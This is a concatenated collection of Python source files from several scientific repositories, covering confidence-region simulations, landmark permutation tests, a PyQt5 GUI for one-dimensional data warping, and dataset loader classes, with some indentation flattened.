_cycle_default = deepcopy( plt.rcParams['axes.prop_cycle'] )
def reset_color_cycle():
set_color_cycle('default')
def set_color_cycle(cyclename=None):
cyclename = 'cr1d' if (cyclename is None) else cyclename
setter = ColorCycleSetter()
setter.set_cycle( cyclename )
class ColorCycleSetter(object):
def __init__(self):
self.cycle_default = _cycle_default
self.cycle_cr1d = plt.cycler( color=CR1DColorMap().hex )
def set_cycle(self, cyclename='cr1d'):
if cyclename not in ['cr1d', 'default']:
raise ValueError('"cyclename" must be "cr1d" or "default"')
cycle = self.cycle_cr1d if (cyclename == 'cr1d') else self.cycle_default
plt.rcParams['axes.prop_cycle'] = cycle
class CR1DColorMap(object):
rgb = [
(148,202,130),
(150,179,221),
(187,147,194),
(153,156,205),
(126,206,244),
(127,197,194),
(127,156,172),
(192,163,108),
]
@property
def name(self):
return self.__class__.__name__
@property
    def cmap(self):
return colors.LinearSegmentedColormap.from_list(self.name, self.rgb01)
@property
def hex(self):
return [colors.rgb2hex(c) for c in self.rgb01]
@property
    def rgb01(self):
return 1.0/255 * np.asarray(self.rgb)
def colors(self, n):
        return self.cmap( np.linspace(0, 1, n) )  # float colormap input lies on [0, 1]
def colorbar_image(self, n=256, vertical=True):
I = np.vstack([range(n)]*10)
if vertical:
I = I.T
return I
def set_prop_cycle(self, ax):
ax.set_prop_cycle(color=self.hex)
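# Hypothetical usage sketch:
# set_color_cycle('cr1d')   # subsequent ax.plot calls cycle through CR1D colors
# reset_color_cycle()       # restore matplotlib's default prop cycle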
```
#### File: examples/sim/sim_bv1d.py
```python
import os
from pathlib import Path
import numpy as np
from matplotlib import pyplot as plt
import cr1d
from spm1d import rft1d
def run_single_iteration(J, fwhm):
y = mu + rft1d.random.multirandn1d(J, Q, I, fwhm, W) # bivariate Gaussian 1D data
ynew = mu + rft1d.random.multirandn1d(1, Q, I, fwhm, W)[0] # an additional random observation
ds = cr1d.BivariateDataset1D(y)
cr = ds.get_confidence_region(alpha=alpha)
pr = ds.get_prediction_region(alpha=alpha)
ci2 = ds.get_ci2(alpha=alpha)
in_cr = cr.isinside(mu) # mu in confidence region?
in_pr = pr.isinside(ynew) # ynew in prediction region?
in_ci2 = ci2.isinside(mu) # mu in CI2?
ynew_in_ci2 = ci2.isinside(ynew) # ynew in CI2?
return in_cr, in_pr, in_ci2, ynew_in_ci2
#(0) Initialize parameters:
np.random.seed(0) # seed the random number generator to replicate results
alpha = 0.05 # Type I error rate
J = np.array([5, 6, 7, 8, 9, 10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 120, 140, 160, 180, 200]) # sample sizes
FWHM = np.array([5, 10, 20, 30, 40, 50]) # smoothness values
Q = 101 # number of continuum nodes
I = 2 # number of vector components
mu = np.zeros((Q,I)) # true population mean
W = np.eye(2) # population covariance
niter = 10000 # number of simulation iterations (10000 replicates the paper's results)
#(1) Simulate:
FPR = [] # false positive rate (outer loop)
for JJ in J:
fpr = [] # false positive rate (inner loop)
for fwhm in FWHM:
print('J=%d, FWHM=%d...'%(JJ,fwhm))
inregion = np.array([run_single_iteration(JJ, fwhm) for i in range(niter)])
avg_inregion = inregion.mean(axis=0)
fpr.append( 1 - avg_inregion )
FPR.append( fpr )
FPR = np.array(FPR)
#(2) Save results
dir0 = Path( __file__ ).parents[2] # Main repository directory
fnameNPZ = os.path.join(dir0, 'Data', 'Simulation', 'results1d.npz') # Simulation results file name
np.savez_compressed(fnameNPZ, fpr=FPR, J=J, FWHM=FWHM)
# #(3) Plot results:
# plt.close('all')
# fig,AX = plt.subplots(2, 2, figsize=(8,6) )
# for i,ax in enumerate( AX.flatten() ):
# ax.plot(J, FPR[:,:,i])
# ax.legend(['CR', 'PR', 'CI2-mu', 'CI2-new'])
# ax.axhline(0.05, color='k', ls=':')
# plt.show()
``` |
{
"source": "0todd0000/lmfree2d",
"score": 3
} |
#### File: lmfree2d/Python/landmarks_massmv.py
```python
import os
import numpy as np
from matplotlib import pyplot as plt
import pandas as pd
import spm1d
import lmfree2d as lm
def two_sample_mass_multivariate_test(r0, r1):
# calculate test statistic values at each landmark:
spm = spm1d.stats.nonparam.hotellings2(r0, r1)
# conduct nonparametric mass-multivariate inference:
spmi = spm.inference(0.05, iterations=-1)
# assemble results:
z = spmi.z # test statistic value for each landmark
zstar = spmi.zstar # critical test statistic
zmax = z.max() # maximum test statistic value
pdf = spmi.PDF0 # permutation distribution
p = ( pdf >= zmax).mean() # p value (percentage of values in pdf greater than or equal to T2max)
return dict(zmax=zmax, zstar=zstar, p=p, z=z)
# #(0) Conduct mass multivariate two-sample test for one dataset:
# ### load data:
# dirREPO = lm.get_repository_path()
# name = 'Bell'
# fname = os.path.join(dirREPO, 'Data', name, 'landmarks_gpa.csv')
# df = pd.read_csv(fname, sep=',')
# ### convert to 3D array (nshapes, nlandmarks, 2)
# nshapes = df['SHAPE'].max()
# nlm = df['LANDMARK'].max()
# r = np.reshape( df[['X','Y']].values, (nshapes,nlm,2) )
# ### separate into groups:
# r0,r1 = r[:5], r[5:]
# ### run nonparametric permutation test:
# res = two_sample_mass_multivariate_test(r0, r1)
# print(res)
#(1) Conduct mass multivariate two-sample test for all datasets:
dirREPO = lm.get_repository_path()
names = ['Bell', 'Comma', 'Device8', 'Face', 'Flatfish', 'Hammer', 'Heart', 'Horseshoe', 'Key']
results = []
for name in names:
### load data:
fname0 = os.path.join(dirREPO, 'Data', name, 'landmarks_gpa.csv')
df = pd.read_csv(fname0, sep=',')
### convert to 3D array (nshapes, nlandmarks, 2)
nshapes = df['SHAPE'].max()
nlm = df['LANDMARK'].max()
r = np.reshape( df[['X','Y']].values, (nshapes,nlm,2) )
### separate into groups:
r0,r1 = r[:5], r[5:]
### run nonparametric permutation test:
res = two_sample_mass_multivariate_test(r0, r1)
results.append(res)
print(name, res['zmax'], res['p'])
### save:
fname1 = os.path.join(dirREPO, 'Results', 'landmarks_massmv.csv')
n = max([res['z'].size for res in results])
header = 'Name,T2max,T2crit,P,' + ','.join( ['T2-%d'%(i+1) for i in range(n)] )
with open(fname1, 'w') as f:
f.write(header + '\n')
for name,res in zip(names,results):
zmax,zc,p,z = res['zmax'], res['zstar'], res['p'], res['z']
fmt = ('%s,' + '%.3f,'*(z.size+3))[:-1] + '\n'
f.write( fmt % ((name,zmax,zc,p)+tuple(z)) )
``` |
{
"source": "0todd0000/mwarp1d",
"score": 2
} |
#### File: ui/dataio/data.py
```python
import os
import numpy as np
from scipy.io import savemat
import mwarp1d
class _MWarp1DData(object):
mode = None #manual or landmark
fname0 = None #input data file name
fname1 = None #output data file name
ydata_template = None #template continuum
ydata_sources = None #source continua
ydata_sources_warped = None #warper sources
def __init__(self):
pass
def __repr__(self):
s = '%s (%s)\n' %(self.__class__.__name__, self.mode)
s += ' ----- FILES -----\n'
s += ' fname0 = %s\n' %self.fname0
s += ' fname1 = %s\n' %self.fname1
s += ' ----- DATA -----\n'
s += ' num nodes = %d\n' %self.nnodes
s += ' num sources = %d\n' %self.nsources
return s
@property
def nnodes(self):
n = 0 if (self.ydata_template is None) else self.ydata_template.size
return n
@property
def nsources(self):
n = 0 if (self.ydata_sources is None) else self.ydata_sources.shape[0]
return n
def _init_other_attributes(self):
pass
def _parse_input_file(self, s):
y = np.loadtxt(s, delimiter=',')
self.ydata_template = y[0]
self.ydata_sources = y[1:]
self.ydata_sources_warped = y[1:].copy()
self._init_other_attributes()
    def get_dictionary(self, format=None):
d = {}
d['mode'] = self.mode
d['filename0'] = self.fname0
d['filename1'] = self.fname1
d['ydata_template'] = self.ydata_template
d['ydata_sources'] = self.ydata_sources
d['ydata_sources_warped'] = self.ydata_sources_warped
return d
    def save(self):
        np.savez_compressed( self.fname1, **self.get_dictionary() )
def set_input_filename(self, s, read=True):
self.fname0 = s
if read:
self._parse_input_file(s)
# self._init_other_attributes()
if self.fname1 is None:
dir1 = os.path.dirname(s)
fname1 = 'mwarp1d_results.npz'
self.fname1 = os.path.join(dir1, fname1)
def set_output_filename(self, s):
self.fname1 = s
def set_sources(self, y, init_warped=False):
self.ydata_sources = y
self._init_other_attributes()
if init_warped:
self.set_sources_warped( y.copy() )
def set_sources_warped(self, y):
self.ydata_sources_warped = y
def set_template(self, y):
self.ydata_template = y
def write_mat(self, fname):
savemat(fname, self.get_dictionary(format='matlab'))
def write_sources_warped_csv(self, fname):
np.savetxt(fname, self.ydata_sources_warped, delimiter=',')
class DataLandmark(_MWarp1DData):
mode = 'landmark'
landmarks_template = None
landmarks_sources = None
landmark_labels = None
def _init_other_attributes(self):
pass
def apply_warps(self, y):
lm0 = self.landmarks_template
lm = self.landmarks_sources
J = y.shape[0]
if y.ndim==2:
if J==self.nsources: #only sources submitted
yw = [mwarp1d.warp_landmark(yy, xx, lm0) for xx,yy in zip(lm,y)]
else: #template also submitted (first row)
yw = [mwarp1d.warp_landmark(yy, xx, lm0) for xx,yy in zip(lm,y[1:])]
yw = [y[0]] + yw
else:
Yw = []
for i in range(y.shape[2]):
if J==self.nsources: #only sources submitted
yw = [mwarp1d.warp_landmark(yy, xx, lm0) for xx,yy in zip(lm,y[:,:,i])]
else: #template also submitted (first row)
yw = [mwarp1d.warp_landmark(yy, xx, lm0) for xx,yy in zip(lm,y[1:,:,i])]
yw = [y[0,:,i]] + yw
Yw.append( np.array(yw) )
yw = np.dstack(Yw)
return np.array(yw)
    def get_dictionary(self, format=None):
d = super().get_dictionary()
d['landmarks_template'] = self.landmarks_template
d['landmarks_sources'] = self.landmarks_sources
d['landmark_labels'] = self.landmark_labels
return d
def set_landmark_labels(self, x):
self.landmark_labels = x
def set_template_landmarks(self, x):
self.landmarks_template = x
def set_source_landmarks(self, x):
self.landmarks_sources = x
def write_landmarks_csv(self, fname):
labels = self.landmark_labels
lm0 = np.asarray(self.landmarks_template, dtype=str)
lm1 = np.asarray(self.landmarks_sources, dtype=str)
# write:
header = ','.join(labels)
blanks = ','.join( ['-']*len(labels) )
with open(fname, 'w') as fid:
fid.write( header + '\n' )
fid.write( ','.join(lm0) + '\n' )
fid.write( blanks + '\n' )
for a in lm1:
fid.write( ','.join(a) + '\n' )
class DataManual(_MWarp1DData):
mode = 'manual'
seqwarps = None
def _init_other_attributes(self):
J,Q = self.ydata_sources.shape
self.seqwarps = np.empty(J, dtype=object)
def apply_warps(self, y):
J,Q = y.shape[:2]
swarps = []
for params in self.seqwarps:
sw = mwarp1d.SequentialManualWarp()
if params is not None:
for p in params:
amp,center,head,tail = p
w = mwarp1d.ManualWarp1D(Q)
w.set_center(center)
w.set_amp(amp)
w.set_head(head)
w.set_tail(tail)
sw.append( w )
swarps.append(sw)
if y.ndim==2:
if J==self.nsources: #only sources submitted
yw = [ww.apply_warp_sequence(yy) for ww,yy in zip(swarps, y)]
else: #template also submitted (first row)
yw = [ww.apply_warp_sequence(yy) for ww,yy in zip(swarps, y[1:])]
yw = [y[0]] + yw
else:
Yw = []
for i in range(y.shape[2]):
if J==self.nsources: #only sources submitted
yw = [ww.apply_warp_sequence(yy) for ww,yy in zip(swarps, y[:,:,i])]
else: #template also submitted (first row)
yw = [ww.apply_warp_sequence(yy) for ww,yy in zip(swarps, y[1:,:,i])]
yw = [y[0,:,i]] + yw
Yw.append( np.array(yw) )
yw = np.dstack(Yw)
return np.array(yw)
def get_dictionary(self, format=None):
d = super().get_dictionary()
w = self.seqwarps
if format=='matlab':
b = np.array([ww is None for ww in w])
w[b] = np.nan
d['seqwarps'] = w
return d
```
#### File: figures/artists/collection.py
```python
from PyQt5 import QtWidgets, QtCore
from . selectable_line import Template,Source
from . draggable_points import TemplateLandmarks,SourceLandmarks
from . stack import SelectionStack
class _LinePointCollection(QtCore.QObject):
LandmarksClass = TemplateLandmarks
LineClass = Template
point_deleted = QtCore.pyqtSignal(object, int)
selected = QtCore.pyqtSignal(object, int)
def __init__(self, ax, y):
super().__init__()
self.ax = ax
self.line = self.LineClass(ax, y, collection=self)
self.h = self.line.h
self.landmarks = None
self.stack = None
def add_landmark(self, x):
self.landmarks.add_point(x)
def get_line_x(self):
return self.line.get_xdata()
def get_line_y(self):
return self.line.get_ydata()
@property
def isvisible(self):
return self.line.isvisible
def on_point_deleted(self, ind):
self.point_deleted.emit(self.landmarks, ind)
def set_landmarks(self, x):
self.landmarks = self.LandmarksClass(self.ax, x, y_constraint=self.get_line_y(), collection=self)
self.stack = SelectionStack(self.ax, [self.landmarks, self.line])
self.line.set_notify(False)
self.landmarks.set_notify(False)
self.stack.set_notify(True)
self.selected = self.stack.selected
self.landmarks.point_deleted.connect( self.on_point_deleted )
def set_active(self, active):
self.line.set_active(active)
if self.landmarks is not None:
self.landmarks.set_active(active)
def set_notify(self, notify):
self.stack.set_notify(notify)
def set_visible(self, visible):
self.landmarks.set_visible(visible)
self.line.set_visible(visible)
class SourceWithLandmarks(_LinePointCollection):
LandmarksClass = SourceLandmarks
LineClass = Source
def calculate_mse(self, template):
y0 = template.line.h.get_ydata()
y = self.h.get_ydata()
return ((y-y0)**2).mean()
class TemplateWithLandmarks(_LinePointCollection):
LandmarksClass = TemplateLandmarks
LineClass = Template
```
#### File: figures/artists/draggable_points.py
```python
from PyQt5 import QtWidgets, QtCore
from math import floor
import numpy as np
from . _base import _SelectableArtist2D
class _DraggablePoints(_SelectableArtist2D):
dragged = QtCore.pyqtSignal(object, int, int, float)
dragging_stopped = QtCore.pyqtSignal()
point_added = QtCore.pyqtSignal(int, int)
point_deleted = QtCore.pyqtSignal(int)
point_delete_failed = QtCore.pyqtSignal()
maxpointsreached = QtCore.pyqtSignal(int)
color_active = 0.98, 0.7, 0.3
color_inactive = '0.7'
dragging_enabled = True
dragging = False
# n = 0 #number of points
nmax = 8 #maximum number of points
selected_ind = None
xminmax = None
def __init__(self, ax, x, y_constraint=None, collection=None):
super().__init__(ax, collection)
self.Q = y_constraint.size
# self.n = len(x)
self.h = self.ax.plot(x, y_constraint[x], 'o', ms=8, color=self.color_active, markeredgecolor='w', zorder=self.zorder)[0]
self.y_constraint = y_constraint
self.ax.figure.canvas.mpl_connect('button_release_event', self.on_release)
self.ax.figure.canvas.mpl_connect('motion_notify_event', self.on_motion)
@property
def n(self):
return self.h.get_xdata().size
@property
def values(self):
return self.h.get_xdata()
def add_point(self, x):
if self.n < self.nmax:
y = self.y_constraint[x]
x0,y0 = self.get_point_coordinates()
x0,y0 = np.append(x0, x), np.append(y0, y)
ind = np.argsort(x0)
self.set_point_coordinates(x0[ind], y0[ind])
# self.n += 1
self.ax.figure.canvas.draw()
col = x0[ind].tolist().index(x)
self.point_added.emit(col, x)
else:
self.maxpointsreached.emit(self.nmax)
def delete_point(self, ind):
deleted = False
if self.n > 1:
x,y = self.get_point_coordinates()
x = np.hstack((x[:ind], x[ind+1:]))
y = np.hstack((y[:ind], y[ind+1:]))
self.set_point_coordinates(x, y)
deleted = True
self.point_deleted.emit(ind)
self.ax.figure.canvas.draw()
else:
self.point_delete_failed.emit()
return deleted
def get_point_coordinates(self):
x,y = self.h.get_xdata(), self.h.get_ydata()
return x,y
def get_previous_point(self, ind):
return None if (ind==0) else (ind-1)
def get_previous_x(self, ind0):
ind = self.get_previous_point(ind0)
return None if (ind is None) else self.h.get_xdata()[ind]
def get_next_point(self, ind):
return None if (ind==(self.n-1)) else (ind+1)
def get_next_x(self, ind0):
ind = self.get_next_point(ind0)
return None if (ind is None) else self.h.get_xdata()[ind]
def get_xminmax(self, ind):
x0,x1 = self.get_previous_x(ind), self.get_next_x(ind)
x0 = 2 if (x0 is None) else x0+2
x1 = self.Q-3 if (x1 is None) else x1-2
return x0,x1
def on_motion(self, event):
if event.inaxes:
# # self.crosshairs.update(x, y)
if self.dragging_enabled and self.dragging:
ind = self.selected_ind
x = floor(event.xdata)
x0,x1 = self.xminmax
x = min(x1, max(x0, x))
y = self.y_constraint[x]
self.set_data(ind, x, y)
self.dragged.emit(self, ind, x, y)
def on_selected(self, ind, distance):
super().on_selected(ind, distance)
self.dragging = True
self.selected_ind = ind
self.xminmax = self.get_xminmax(ind)
def on_release(self, event):
self.dragging_stopped.emit()
self.dragging = False
self.selected_ind = None
self.xminmax = None
def set_active(self, active):
super().set_active(active)
self.isselectable = active
def set_all_xdata(self, x):
self.h.set_xdata(x)
self.h.set_ydata( self.y_constraint[x] )
def set_data(self, ind, xnew, ynew):
x,y = self.h.get_xdata(), self.h.get_ydata()
x[ind] = xnew
y[ind] = ynew
self.h.set_xdata(x)
self.h.set_ydata(y)
def set_dragging_enabled(self, enabled):
self.dragging_enabled = enabled
def set_point_coordinates(self, x, y):
self.h.set_xdata(x)
self.h.set_ydata(y)
class SourceLandmarks(_DraggablePoints):
color_active = 0.98, 0.7, 0.3
zorder = 1
def set_active(self, active):
super().set_active(active)
self.h.set_visible(active)
class TemplateLandmarks(_DraggablePoints):
color_active = 0.3, 0.3, 0.98
zorder = 3
```
#### File: figures/artists/warpable_line.py
```python
from PyQt5 import QtWidgets, QtCore
import numpy as np
from . _base import _SelectableArtist2D
import mwarp1d
class _WarpableLine(_SelectableArtist2D):
linewidth = 0.5
iswarpable = True
selected = QtCore.pyqtSignal(object, int, float)
warp_initiated = QtCore.pyqtSignal(object, int)
def __init__(self, ax, y):
super().__init__(ax, None)
self.Q = y.size
self.x0 = np.arange(self.Q) #original (unwarped) domain
self.y0 = y #original (unwarped) data
self.xw = self.x0.copy() #current warped domain
self.yw = y.copy() #current warped data (updated only after saving warp)
self.seqw = mwarp1d.SequentialManualWarp()
self.h0 = self.ax.plot(y, ':', lw=2, color=(0.8,0.3,0.3), zorder=self.zorder-1)[0] #original, unwarped curve
self.h = self.ax.plot(y, '-', lw=self.linewidth, color=self.color_active, zorder=self.zorder)[0] #current warped curve
self.h0.set_visible(False)
def on_press(self, event):
if self.isselectable:
if event.button == 1 and self.isvisible:
mx,my = event.xdata, event.ydata #mouse coordinates
ind,d = self.distance2mouseclick(mx, my)
if d < self.threshold:
self.isselected = True
self.selected.emit(self, ind, d)
else:
self.isselected = False
def reset_domain(self):
self.h.set_xdata(self.x0)
self.h.set_ydata(self.y0)
self.xw = self.x0.copy()
self.yw = self.y0.copy()
self.seqw.reset()
def revert_to_previous_warp(self):
self.set_warped_domain( self.xw )
# self.xw = self.x0.copy()
def save_warp(self, warp):
self.xw = self.x0.copy()
self.yw = warp.apply_warp( self.h.get_ydata().copy() )
self.seqw.append(warp.copy())
self.h.set_xdata( self.xw )
self.h.set_ydata( self.yw )
def set_original_visible(self, visible=True):
self.h0.set_visible(visible)
def set_warped_domain(self, x):
self.h.set_xdata(x)
def set_warped_ydata(self, y):
self.yw = y
self.h.set_ydata(y)
def toggle_original_source_visibility(self):
self.h0.set_visible( not self.h0.get_visible() )
def update_warped_domain(self, xw):
xw_new = self.xw + (xw - self.x0)
self.set_warped_domain( xw_new )
class WarpableSource(_WarpableLine):
linewidth = 0.5
zorder = 0
def calculate_mse(self, template, normalized=True):
if normalized:
y0 = template.get_ydata_normalized()
y = self.get_ydata_normalized()
else:
y0 = template.h.get_ydata()
y = self.h.get_ydata()
return ((y-y0)**2).mean()
class WarpableTemplate(_WarpableLine):
iswarpable = False
linewidth = 5
zorder = 2
```
#### File: ui/figures/simple_figure.py
```python
import sys,os
from PyQt5 import QtWidgets, QtCore, uic
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from matplotlib import cm
import numpy as np
class SimpleFigure(FigureCanvas):
def __init__(self, parent=None):
self.figure = Figure(dpi=100)
self.ax = self.figure.add_axes([0,0,1,1])
super().__init__(self.figure)
self.setParent(parent)
super().setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
super().updateGeometry()
self.setFocusPolicy( QtCore.Qt.ClickFocus )
self.setFocus()
def plot(self, y):
self.ax.plot( y.T )
def plot_mv(self, y):
n = y.shape[2]
colors = cm.jet( np.linspace(0, 1, n) )
for i,c in enumerate(colors):
self.ax.plot( y[:,:,i].T, color=c, lw=0.5 )
def reset(self):
self.ax.cla()
self.ax.figure.canvas.draw()
```
#### File: mwarp1d/ui/panel_main.py
```python
import sys,os
from PyQt5 import QtWidgets, QtCore, uic
import numpy as np
from widgets import FileSaveDialog,MessageBox
import dataio
class MainPanel(QtWidgets.QWidget):
def __init__(self, parent=None):
super().__init__(parent=parent)
fnameUI = os.path.join( os.path.dirname(__file__), 'panel_main.ui' )
uic.loadUi(fnameUI, self)
self.fname = None #data file name
self.fname1 = None #results file name
self.mainapp = parent
self.template_array = None
self.sources_array = None
self.stackedwidget.setCurrentIndex(0)
self.groupbox_warping_mode.setEnabled(False)
self.label_drop_data_files.set_filetypes( ['CSV', 'NPZ'] )
### connect callbacks:
self.button_clear.clicked.connect(self.on_button_clear)
self.button_landmarks.clicked.connect(self.on_button_landmarks)
self.button_manual.clicked.connect(self.on_button_manual)
self.label_drop_data_files.files_dropped.connect( self.on_drop )
self.label_filename_results.clicked.connect( self.on_button_filename )
@staticmethod
def _loadtxt(fname):
try:
y = np.loadtxt(fname, delimiter=',')
except ValueError:
y = np.loadtxt(fname, delimiter=',', encoding='utf-8-sig')
return y
def _plot(self):
y0 = self.template_array
y = self.sources_array
ax = self.fig.ax
h0 = ax.plot( y0, lw=5, color='k')[0]
h1 = ax.plot( y.T, lw=1, color='0.8')[0]
ax.legend([h0,h1], ['Template','Source'])
ax.figure.canvas.draw()
def on_button_clear(self):
self.reset_panel()
def on_button_filename(self):
fname = None
dialog = FileSaveDialog('npz')
dialog.setDirectory( os.path.dirname(self.fname1) )
dialog.setAcceptMode(QtWidgets.QFileDialog.AcceptSave)
s = os.path.split( self.fname1 )[-1]
dialog.selectFile( s )
if dialog.exec_() == QtWidgets.QDialog.Accepted:
fname = dialog.selectedFiles()[0]
if fname is not None:
self.fname1 = fname
self.label_filename_results.setText( fname )
return fname
def on_button_landmarks(self):
self.mainapp.start_landmark_mode(self.template_array, self.sources_array, self.fname, self.fname1)
def on_button_manual(self):
self.mainapp.start_manual_mode(self.template_array, self.sources_array, self.fname, self.fname1)
def on_drop(self, filenames):
success = False
nfiles = len(filenames)
if nfiles==1:
fname = filenames[0]
ext = os.path.splitext(fname)[1]
self.mainapp.set_default_directory( os.path.dirname(fname) )
if ext=='.csv':
fname1 = self.mainapp.get_results_filename(fname)
y = self._loadtxt(fname)
y0,y = y[0], y[1:]
self.fname = fname
self.fname1 = fname1
self.template_array = y0
self.sources_array = y
self._plot()
self.label_nsources.setText( str(y.shape[0]) )
self.label_nnodes.setText( str(y0.size) )
self.label_filename_results.setText( fname1 )
success = True
elif ext=='.npz':
data = dataio.loadnpz(fname)
self.start_npz(data)
else:
MessageBox('Error: only csv and npz')
self.label_drop_data_files.set_color(0)
if success:
self.stackedwidget.setCurrentIndex(1)
self.groupbox_warping_mode.setEnabled(True)
def reset_panel(self):
self.label_filename_results.setText( "" )
self.label_nsources.setText( "" )
self.label_nnodes.setText( "" )
self.groupbox_warping_mode.setEnabled(False)
self.label_drop_data_files.reset_color()
self.fname = None
self.fname1 = None
self.template_array = None
self.sources_array = None
self.fig.reset()
self.stackedwidget.setCurrentIndex(0)
def set_fname_results(self, s):
self.fname1 = s
self.label_filename_results.setText( s )
def start_npz(self, data):
self.mainapp.start_npz(data)
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
widget = MainPanel()
widget.show()
sys.exit(app.exec_())
```
#### File: ui/widgets/table_landmarks.py
```python
import sys,os
import numpy as np
from PyQt5 import QtWidgets, QtGui, QtCore
class VHeaderContextMenu(QtWidgets.QMenu):
def __init__(self, parent, row):
super().__init__(parent)
menu = QtWidgets.QMenu(self)
label = 'Unflag' if parent.rowflags[row] else 'Flag'
a = QtWidgets.QAction(label, self)
a.triggered.connect( lambda: parent.toggle_flag(row) )
menu.addAction(a)
menu.popup( QtGui.QCursor.pos() )
class _LandmarksTable(QtWidgets.QTableWidget):
def __init__(self, *args):
super().__init__(*args)
self.cellcolors = [QtGui.QColor(*x) for x in [(255,255,255), (200,200,200)]]
self.fontcolors = [QtGui.QColor(*x) for x in [(200,200,200), (200,100,100), (50,150,50)]]
def _build_table(self, update_counts=False):
self.setRowCount( self.nrow )
self.setColumnCount( self.ncol )
[self.setColumnWidth(i, 50) for i in range(self.ncol)]
for i in range( self.nrow ):
for ii in range( self.ncol ):
item = QtWidgets.QTableWidgetItem()
item.setTextAlignment( QtCore.Qt.AlignCenter )
self.setItem(i, ii, item)
item.setText( str(self.A[i,ii]) )
item.setFlags( QtCore.Qt.ItemIsEnabled )
if update_counts:
self.panel.update_counts()
def _set_row_color(self, ind, c):
for i in range(self.ncol):
self.item(ind,i).setBackground( c )
def delete_landmark(self, col):
labels = self.get_landmark_names()
labels.pop(col)
self.A = np.hstack([self.A[:,:col], self.A[:,col+1:] ])
self._build_table(update_counts=True)
self.setHorizontalHeaderLabels( labels )
def get_landmark_names(self):
return [self.horizontalHeaderItem(c).text() for c in range(self.ncol)]
def insert_landmark(self, col, x):
i = col
z = np.array([[x]*self.nrow], dtype=int).T
labels = [self.horizontalHeaderItem(c).text() for c in range(self.ncol)]
labels.insert(i, 'L')
self.A = np.hstack([self.A[:,:i], z, self.A[:,i:] ])
self._build_table(update_counts=True)
self.setHorizontalHeaderLabels( labels )
def rename_landmark(self, col):
self.panel.rename_landmark(col)
@QtCore.pyqtSlot(QtCore.QPoint)
def on_vheader_rightclick(self, point):
index = self.indexAt(point)
row = index.row()
        if row > 0:
menu = VHeaderContextMenu(self, row)
def on_vertical_header(self, index):
if index>0:
for i in range(1, self.nrow):
self._set_row_color(i, self.cellcolors[0])
self._set_row_color(index, self.cellcolors[1])
@property
def ncol(self):
return self.A.shape[1]
@property
def nrow(self):
return self.A.shape[0]
def toggle_flag(self, row):
self.rowflags[row] = not self.rowflags[row]
class LandmarksTableTemplate(_LandmarksTable):
def _init(self, panel):
self.panel = panel
self.A = np.array([[25, 50, 75]])
self._build_table()
self.setHorizontalHeaderLabels(['L%d'%(i+1) for i in range(self.ncol)])
self.horizontalHeader().sectionClicked.connect(self.panel.rename_landmark)
self.setVerticalHeaderLabels(['___'])
self.setVerticalScrollBarPolicy( QtCore.Qt.ScrollBarAlwaysOff )
self.verticalHeaderItem(0).setForeground( QtGui.QBrush( QtGui.QColor( *[240]*3 ) ) )
class LandmarksTableSources(_LandmarksTable):
def _init(self, panel):
self.panel = panel
n = 8
self.A = np.vstack([[25]*n, [50]*n, [75]*n]).T
self.rowflags = [False]*self.nrow
self._build_table()
self.setHorizontalHeaderLabels( panel.get_landmark_names() )
self.setVerticalHeaderLabels(['%03d'%(i+1) for i in range(self.nrow)])
self.horizontalHeader().sectionClicked.connect(self.panel.rename_landmark)
vheader = self.verticalHeader()
vheader.sectionClicked.connect(self.on_vertical_header)
vheader.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)
vheader.customContextMenuRequested.connect(self.on_vheader_rightclick)
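# --- illustrative usage sketch (an addition; the stub panel below is a
# hypothetical stand-in for the real panel object this widget expects) ---
class _StubPanel:
    def rename_landmark(self, col):
        print('rename landmark', col)
    def update_counts(self):
        print('counts updated')
    def get_landmark_names(self):
        return ['L1', 'L2', 'L3']
if __name__ == '__main__':
    app = QtWidgets.QApplication(sys.argv)
    table = LandmarksTableSources()
    table._init(_StubPanel())
    table.show()
    sys.exit(app.exec_())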
``` |
{
"source": "0todd0000/nlreg1d",
"score": 3
} |
#### File: nlreg1d/nlreg1d/data.py
```python
import os,pathlib
import numpy as np
from matplotlib import pyplot as plt
from . import dirDATA
class _Dataset(object):
fpath = None # path to data file
def __init__(self):
self.dv = None # dependent variable
self.group = None # group
self._load()
def __repr__(self):
s = f'Dataset: {self.name}\n'
s += f' fpath = {self.fpath}\n'
s += f' shape = {self.shape}\n'
s += f' groups = {self.ug.tolist()}\n'
return s
def _load(self):
a = np.loadtxt( self.fpath, delimiter=',')
self.group = np.asarray(a[:,0], dtype=int)
self.dv = a[:,1:]
@property
def J(self): # number of observations
return self.dv.shape[0]
@property
def Q(self): # number of grid points
return self.dv.shape[1]
@property
def filename(self): # dataset name
return os.path.split( self.fpath )[1]
@property
def name(self): # dataset name
return self.__class__.__name__
@property
def q(self): # grid points (equally spaced over [0,1])
return np.linspace(0, 1, self.Q)
@property
def shape(self): # dependent variable array shape
return self.dv.shape
@property
def ug(self): # unique group labels
return np.unique(self.group)
def get_dv_by_group(self):
return [self.dv[self.group==u] for u in self.ug]
def plot(self, ax=None, colors=('b', 'r')):
ax = plt.gca() if (ax is None) else ax
y0,y1 = self.get_dv_by_group()
ax.plot(self.q, y0.T, color=colors[0], lw=0.3)
ax.plot(self.q, y1.T, color=colors[1], lw=0.3)
h0 = ax.plot(self.q, y0.mean(axis=0), color=colors[0], lw=5)[0]
h1 = ax.plot(self.q, y1.mean(axis=0), color=colors[1], lw=5)[0]
ax.legend([h0,h1], [f'Group {self.ug[0]} mean', f'Group {self.ug[1]} mean'])
ax.set_title( self.name )
class Besier2009VastusForce(_Dataset):
fpath = os.path.join( dirDATA, 'Besier2009-vastus.csv' )
class Dorn2012(_Dataset):
fpath = os.path.join( dirDATA, 'Dorn2021-reduced.npz' )
def _load(self):
with np.load( self.fpath, allow_pickle=True ) as z:
self.group = z['speed']
self.dv = z['y']
class Pataky2014MediolateralCOP(_Dataset):
fpath = os.path.join( dirDATA, 'Pataky2014-mediolateral.csv' )
class SimulatedA(_Dataset):
fpath = os.path.join( dirDATA, 'SimulatedA.csv' )
class SimulatedB(_Dataset):
fpath = os.path.join( dirDATA, 'SimulatedB.csv' )
```
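A minimal usage sketch for the dataset classes above (an illustrative addition; it assumes the packaged CSV files are present under `dirDATA`, that the module is importable as `nlreg1d.data`, and that the dataset contains exactly two groups, as `plot` expects):
```python
from matplotlib import pyplot as plt
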